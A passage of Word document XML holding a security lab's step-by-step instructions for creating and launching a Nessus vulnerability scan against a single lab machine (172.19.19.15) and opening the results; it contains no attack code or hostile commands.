    <w:p w14:paraId="09DF44D8" w14:textId="3FB8BCAA"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539E5B63">
          <v:shape id="_x0000_i1280" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId62" w:name="DefaultOcxName28" w:shapeid="_x0000_i1280"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To begin a new scan, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>My Scans</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560D53B" w14:textId="503A8464"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D24C1B9" wp14:editId="0430690B">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1198371019" name="図 2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7EE10C33" w14:textId="10B666C5"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0628D178">
          <v:shape id="_x0000_i1279" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId64" w:name="DefaultOcxName29" w:shapeid="_x0000_i1279"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Create a New Scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> link to create a new scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E0394" w14:textId="4C014784"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66F8946D" wp14:editId="06F04E87">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1008273422" name="図 2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3AFC12C4" w14:textId="73C30DC6"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6962FD66">
          <v:shape id="_x0000_i1278" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId66" w:name="DefaultOcxName30" w:shapeid="_x0000_i1278"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once you click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>New Scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> button, it will redirect you to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Scan Templates</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> window, where you need to select the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> you have created. The created policy is present in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>User Defined Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section, so click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>User Defined</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368C669" w14:textId="08970F7D"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15A03029">
          <v:shape id="_x0000_i1277" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId67" w:name="DefaultOcxName31" w:shapeid="_x0000_i1277"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>User Defined</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> policy section appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System Scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590A8DA" w14:textId="2F38AF91"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3D646345" wp14:editId="7E8E2BF1">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="855299466" name="図 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69AA6CAA" w14:textId="05F99F42"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4F4127C1">
          <v:shape id="_x0000_i1276" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId69" w:name="DefaultOcxName32" w:shapeid="_x0000_i1276"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section of the Scan Templates appears. Set a name for the scan in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Text field (here, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System_Scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>), type a description for the scan in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> field, leave the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Folder</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> field set to default and enter the IP address of Advertisement Dept. machine in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> text field (here, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>172.19.19.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>). Click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module in the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A179BCF" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>You can specify a multiple number of machines to scan using Nessus. For lab demonstration, we are using a single machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C13D2D" w14:textId="6FAB6464"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119F0137" wp14:editId="31499A26">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1981134920" name="図 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3E54AD2E" w14:textId="6E92E3C3"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1BFE5640">
          <v:shape id="_x0000_i1275" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId71" w:name="DefaultOcxName33" w:shapeid="_x0000_i1275"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section allows you to specify the frequency of the scan. In this section, you can specify how often you want Nessus to scan the target machine. Leave this setting to default, click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> drop-down menu and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Launch</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This will launch a vulnerability scan on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5184A2A3" w14:textId="46F0B706"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073FA2BB" wp14:editId="6C95B940">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1614346825" name="図 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68603AC1" w14:textId="046E25CD"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2F528C5E">
          <v:shape id="_x0000_i1274" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId73" w:name="DefaultOcxName34" w:shapeid="_x0000_i1274"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As soon as you click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Launch</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> link, Nessus will begin the scan on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine as shown in the screenshot below. It will take around 10 minutes to scan the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBADB66" w14:textId="4A332BAA"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CDFC0FA" wp14:editId="5AD57695">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1671295427" name="図 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717FB75C" w14:textId="23158BE9"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="7EFAED97">
          <v:shape id="_x0000_i1273" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId75" w:name="DefaultOcxName35" w:shapeid="_x0000_i1273"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once the scan is completed, it will display a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tick</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> mark as shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAA466C" w14:textId="7C2AE1F7"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B79B196" wp14:editId="6C00F7AF">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="472804189" name="図 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5E5C7CC4" w14:textId="1884251D"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069ED1E3">
          <v:shape id="_x0000_i1272" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId77" w:name="DefaultOcxName36" w:shapeid="_x0000_i1272"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System_Scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to view the scan result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B5BBF" w14:textId="79300706"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15E6B7D3" wp14:editId="7F1F91F9">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1432344365" name="図 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236B817C" w14:textId="3FB21CE2"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4F26E2A2">
          <v:shape id="_x0000_i1271" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId79" w:name="DefaultOcxName37" w:shapeid="_x0000_i1271"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click on </w:t>
      </w:r>
